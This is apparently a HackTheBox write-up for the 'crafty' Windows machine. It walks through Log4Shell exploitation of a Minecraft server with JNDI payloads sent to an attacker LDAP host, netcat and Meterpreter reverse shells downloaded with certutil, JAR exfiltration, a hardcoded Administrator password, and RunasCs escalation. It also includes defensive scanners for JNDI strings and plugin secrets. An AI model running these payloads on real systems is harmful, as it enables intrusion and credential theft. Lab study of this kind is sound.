HTB: crafty Writeup


Machine Information

Name: crafty
OS: Windows
Difficulty: Easy
Points: N/A
Release Date: N/A
IP Address: 10.129.219.158
Author: D3vnomi

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐⭐☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

crafty is an Easy-difficulty Windows machine featuring a Microsoft IIS 10.0 web server and a vulnerable Minecraft 1.16.5 server. The attack leverages CVE-2021-44228 (Log4Shell) for initial code execution. The exploitation path involves reconnaissance through port scanning and subdomain enumeration, gaining an initial foothold via Log4j RCE on the Minecraft server, extracting hardcoded credentials from a compiled plugin, and finally achieving privilege escalation to Administrator through credential reuse.

TL;DR: Port enumeration → Subdomain discovery → Log4Shell RCE → Plugin extraction → Credential discovery → Privilege escalation to Administrator.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.219.158

Results:

80/tcp open http Microsoft-IIS/10.0
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server)

Directory & Subdomain Enumeration

Web directories (gobuster):

gobuster dir -u http://crafty.htb -w /usr/share/wordlists/common.txt

Discovered directories: /home, /img, /css, /js, /coming-soon

Subdomain enumeration (ffuf):

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://crafty.htb -H "Host: FUZZ.crafty.htb" -fs 11564

Discovered subdomain: play.crafty.htb

Service Enumeration

Hostname: crafty.htb

Add to /etc/hosts:

echo "10.129.219.158 crafty.htb" >> /etc/hosts
echo "10.129.219.158 play.crafty.htb" >> /etc/hosts

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2021-44228 (Log4Shell) — Minecraft 1.16.5 is vulnerable to Log4j Remote Code Execution through JNDI injection in chat messages.

Initial Foothold

Log4Shell RCE (CVE-2021-44228)

Minecraft 1.16.5 is vulnerable to Log4j JNDI injection. The vulnerability allows remote code execution by sending a crafted message to the Minecraft server chat.
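The point that matters for a defender is that Log4j 2.x evaluates `${...}` lookups inside the logged message itself, and chat text is logged verbatim by the server. The scanner below is an added example written for this writeup, not code from the original post or from any of the tools it uses. It folds the common lookup-nesting tricks (`${lower:j}`, `${upper:N}`, the default-value form `${env:NOPE:-j}` and `${::-j}`) before matching, so a review of server logs catches obfuscated payloads as well as the plain `${jndi:...}` form. The log lines are constructed for the demonstration, and the `192.0.2.x` addresses are from the documentation range.

```python
"""Detect Log4j JNDI lookups in Minecraft chat/console log lines (added example)."""
import re
from typing import Optional

# ${lower:X} / ${upper:X} resolve to X; the lookup name is case-insensitive.
LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I)
# ${anything:-default} resolves to "default" when the lookup fails, e.g. ${::-j}.
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# After normalization a lookup reads ${jndi:<scheme>:...}; capture the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")


def normalize(text: str) -> str:
    """Fold nested lookup tricks repeatedly until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = LOWER_UPPER.sub(lambda m: m.group(1), text)
        text = DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text.lower()


def jndi_scheme(line: str) -> Optional[str]:
    """Return the JNDI provider scheme (ldap, rmi, dns, ...) if the line carries a lookup."""
    match = JNDI_LOOKUP.search(normalize(line))
    return match.group(1) if match else None


def scan_log(lines: list) -> list:
    """Return (1-based line number, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((number, scheme))
    return hits


# Constructed sample in the Minecraft server log format; not a real capture.
SAMPLE_LOG = [
    "[12:01:15] [Server thread/INFO]: <steve> hello everyone",
    "[12:01:20] [Server thread/INFO]: <mallory> ${jndi:ldap://192.0.2.10:1389/a}",
    "[12:01:31] [Server thread/INFO]: <mallory> ${${lower:j}ndi:${lower:r}mi://192.0.2.10:1099/x}",
    "[12:01:45] [Server thread/INFO]: <mallory> ${${env:NOPE:-j}ndi:${::-l}dap://192.0.2.10:1389/b}",
    "[12:01:58] [Server thread/INFO]: <mallory> ${JNDI:DNS://192.0.2.10/x}",
    "[12:02:00] [Server thread/INFO]: <alex> price is ${5} lol",
]

if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Run it over a real `logs/latest.log` by replacing `SAMPLE_LOG` with the file's lines. Detection is a stopgap: the durable fix for operators is upgrading the bundled Log4j to 2.17.1 or later (or removing the `JndiLookup` class from the Log4j jar); the `log4j2.formatMsgNoLookups=true` flag only helps on Log4j 2.10 through 2.14.1.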

Step 1: Clone and Setup log4j-shell-poc

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc

Step 2: Generate the JNDI Payload

python3 poc.py --userip 10.10.14.105 --webport 25565 --lport 9001

This generates the JNDI payload in the format:

${jndi:ldap://10.10.14.105:1389/a}

The script automatically sets up the LDAP and HTTP servers for exploitation.

Step 3: Start Netcat Listener

nc -lvnp 9001

Step 4: Connect to Minecraft Server and Send Payload

Connect to the Minecraft server using TLauncher or PyCraft:

python3 client.py --address crafty.htb --port 25565 --username attacker

In the chat, send the JNDI payload:

${jndi:ldap://10.10.14.105:1389/a}

Step 5: Receive Shell

Once the payload is processed by the server, the netcat listener will receive a reverse shell as the svc_minecraft user:

Listening on [0.0.0.0] 9001 ...
Connection received on [10.129.219.158] 52341
Microsoft Windows [Version 10.0.17763.2928]
C:\Users\svc_minecraft\server>

User Compromise

Initial Shell Upgrade to Meterpreter

The initial netcat shell is basic and unstable. Upgrade to Meterpreter for better stability and features.

Step 1: Generate Meterpreter Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=4444 -f exe -o s1.exe

Step 2: Start HTTP Server and Metasploit Handler

On attacker machine, start HTTP server:

python3 -m http.server 8000

Start Metasploit multi/handler:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.105
set LPORT 4444
exploit

Step 3: Download and Execute Payload

From the svc_minecraft shell:

certutil -urlcache -f http://10.10.14.105:8000/s1.exe s1.exe
.\s1.exe

You will receive a Meterpreter session as svc_minecraft.

User Flag

cat C:\Users\svc_minecraft\Desktop\user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

whoami
whoami /priv
net user
systeminfo

The output shows we are running as the svc_minecraft user.

Plugin Extraction and Decompilation

The Minecraft server stores a plugin JAR file at:

C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar

Step 1: Exfiltrate the JAR File

Using PowerShell to encode the JAR as base64:

$FileName = "C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName))
echo $base64string

Copy the base64 output and decode it on the attacker machine:

echo "<base64_string>" | base64 -d > plugin.jar

Step 2: Decompile the JAR

Using jd-gui to decompile the JAR file:

jd-gui plugin.jar

Search through the decompiled code to find hardcoded credentials. In the plugin code, you’ll find:

Administrator:s67u84zKq8IXw
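The lesson of the plugin step is that string literals survive compilation intact: they sit in each class file's constant pool, so a plugin author's hardcoded password is readable without a decompiler. The scanner below is an added example for auditing plugin JARs before deploying them; it is not code from the writeup, from jd-gui, or from the playercounter plugin. It parses the constant pool of every `.class` in a JAR (JVM class-file layout: magic, versions, `constant_pool_count`, tagged entries) and reports only the Utf8 entries referenced by a `CONSTANT_String`, which are actual literals rather than method names or descriptors. The JAR it scans is constructed in memory, and the class name, file names and the credential value inside it are invented for the demonstration.

```python
"""Audit a plugin JAR for hardcoded string literals (added example)."""
import io
import re
import struct
import zipfile

# Operand size in bytes for fixed-width constant-pool tags (tag 1, Utf8, is variable).
FIXED_OPERAND_SIZE = {
    3: 4, 4: 4,            # Integer, Float
    5: 8, 6: 8,            # Long, Double (each also occupies two pool slots)
    7: 2, 8: 2,            # Class, String
    9: 4, 10: 4, 11: 4,    # Fieldref, Methodref, InterfaceMethodref
    12: 4,                 # NameAndType
    15: 3, 16: 2,          # MethodHandle, MethodType
    17: 4, 18: 4,          # Dynamic, InvokeDynamic
    19: 2, 20: 2,          # Module, Package
}
CREDENTIAL_WORDS = re.compile(r"pass|pwd|secret|token|credential", re.I)


def class_string_literals(data: bytes) -> list:
    """Return the string literals of one class file (Utf8 entries reached via CONSTANT_String)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    utf8 = {}          # pool index -> decoded text
    string_refs = []   # Utf8 indices pointed to by CONSTANT_String entries
    pos, idx = 10, 1
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        else:
            if tag == 8:
                string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED_OPERAND_SIZE[tag]
        idx += 2 if tag in (5, 6) else 1   # Long/Double take two slots
    return [utf8[i] for i in string_refs if i in utf8]


def looks_like_secret(literal: str) -> bool:
    """Heuristic: credential keyword, a user:password shape, or a dense mixed-case token."""
    if CREDENTIAL_WORDS.search(literal):
        return True
    if re.fullmatch(r"[A-Za-z0-9_.\-]+:[^\s:]{8,}", literal):
        return True
    dense = (len(literal) >= 12 and " " not in literal
             and re.search(r"[a-z]", literal) and re.search(r"[A-Z]", literal)
             and re.search(r"\d", literal))
    return bool(dense)


def scan_jar(jar_bytes: bytes) -> dict:
    """Map each class in the JAR to the string literals that look like secrets."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                hits = [s for s in class_string_literals(jar.read(name)) if looks_like_secret(s)]
                if hits:
                    findings[name] = hits
    return findings


def _utf8(text: bytes) -> bytes:
    return b"\x01" + struct.pack(">H", len(text)) + text


def build_sample_jar() -> bytes:
    """Constructed sample: a minimal class (truncated after its constant pool) with one credential literal."""
    pool = (
        _utf8(b"Administrator:Example_Passw0rd")   # 1: literal text (invented credential)
        + b"\x08" + struct.pack(">H", 1)            # 2: CONSTANT_String -> #1
        + _utf8(b"Player count updated")            # 3: benign literal text
        + b"\x08" + struct.pack(">H", 3)            # 4: CONSTANT_String -> #3
        + _utf8(b"getPassword")                     # 5: a method name, not a literal
        + b"\x05" + b"\x00" * 8                     # 6-7: CONSTANT_Long uses two slots
        + b"\x07" + struct.pack(">H", 5)            # 8: CONSTANT_Class -> #5
    )
    klass = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 9) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/example/PlayerCounter.class", klass)
        jar.writestr("plugin.yml", "name: playercounter\n")
    return buf.getvalue()


if __name__ == "__main__":
    for cls, hits in scan_jar(build_sample_jar()).items():
        print(cls, hits)
```

To audit a real plugin, pass `open("plugin.jar", "rb").read()` to `scan_jar`. Note that `getPassword` is not reported even though it contains "pass": it is a method name, not a `CONSTANT_String`, which is why the scanner follows String references instead of dumping every Utf8 entry.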

Privilege Escalation via RunasCs

Step 1: Download RunasCs.exe

Download RunasCs.exe (a Windows RunAs alternative that works better with reverse shells).

Step 2: Generate Second Meterpreter Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=4445 -f exe -o s2.exe

Step 3: Execute Payload as Administrator

Upload both RunasCs.exe and s2.exe to the target machine via HTTP:

certutil -urlcache -f http://10.10.14.105:8000/RunasCs.exe RunasCs.exe
certutil -urlcache -f http://10.10.14.105:8000/s2.exe s2.exe

Execute the second payload as Administrator:

.\RunasCs.exe "Administrator" "s67u84zKq8IXw" "s2.exe"

Step 4: Receive Administrator Shell

A Metasploit handler for port 4445 must be listening when s2.exe runs:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.105
set LPORT 4445
exploit

You will receive a Meterpreter session as Administrator.

Root Flag

type C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Port Scanning<br/>(nmap)"] --> B["Discover Port 25565<br/>(Minecraft 1.16.5)"]
B --> C["Subdomain Enumeration<br/>(ffuf: play.crafty.htb)"]
C --> D["Log4Shell RCE<br/>(CVE-2021-44228)"]
D --> E["Initial Shell<br/>(svc_minecraft)"]
E --> F["Upgrade to Meterpreter<br/>(certutil + msfvenom)"]
F --> G["Extract Plugin JAR<br/>(playercounter)"]
G --> H["Decompile with jd-gui<br/>(Find Credentials)"]
H --> I["Discover Admin Creds<br/>(Administrator:s67u84zKq8IXw)"]
I --> J["RunasCs.exe Execution<br/>(Second Meterpreter)"]
J --> K["Administrator Shell<br/>(Full Compromise)"]
style A fill:#ff7f50
style E fill:#87ceeb
style K fill:#32cd32

Tools Used

nmap: Port and service scanning
gobuster: Web directory enumeration
ffuf: Subdomain enumeration and fuzzing
log4j-shell-poc: Log4Shell exploitation
TLauncher / PyCraft: Minecraft client for payload delivery
netcat: Reverse shell listener
msfvenom: Metasploit payload generation
metasploit: Multi-handler for reverse shells
certutil: Windows utility for file downloads
jd-gui: JAR file decompilation
PowerShell: Base64 encoding for file exfiltration
RunasCs.exe: Execute commands as a different user
python3: HTTP server and scripting

Vulnerability Reference

  1. CVE-2021-44228 (Log4Shell)
     Component: Apache Log4j / Minecraft 1.16.5
     Severity: Critical
     Impact: Remote Code Execution via JNDI injection in chat messages

Key Learnings

  1. Service Version Enumeration is Critical: Identify all running services and their versions. Minecraft 1.16.5 is vulnerable to Log4Shell, a critical RCE vulnerability that affects many services using Apache Log4j.

  2. Game Servers as Attack Vectors: Multiplayer game servers like Minecraft are often overlooked but can provide direct code execution paths through chat message processing.

  3. JNDI Injection Exploitation: The Log4Shell vulnerability exploits JNDI (Java Naming and Directory Interface) to achieve RCE. Understanding how log libraries process untrusted input is crucial.

  4. Plugin/Mod Code Analysis: Extracting and decompiling application plugins can reveal hardcoded credentials. Never hardcode sensitive information in compiled code.

  5. Credential Reuse: Administrative credentials hardcoded in plugins enable privilege escalation through RunasCs.exe or similar tools. Always assume credentials found in one context may grant access at higher privilege levels.

  6. Shell Upgrade Strategy: Initial shells (netcat) should be upgraded to more powerful frameworks (Meterpreter) for stability and additional capabilities needed for post-exploitation.

  7. Multi-Stage Exploitation: Complex targets often require multiple payload stages and different attack techniques. First compromise gets a foothold, plugin analysis gets credentials, and RunasCs executes the final payload as admin.


Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Easy #CVE-2021-44228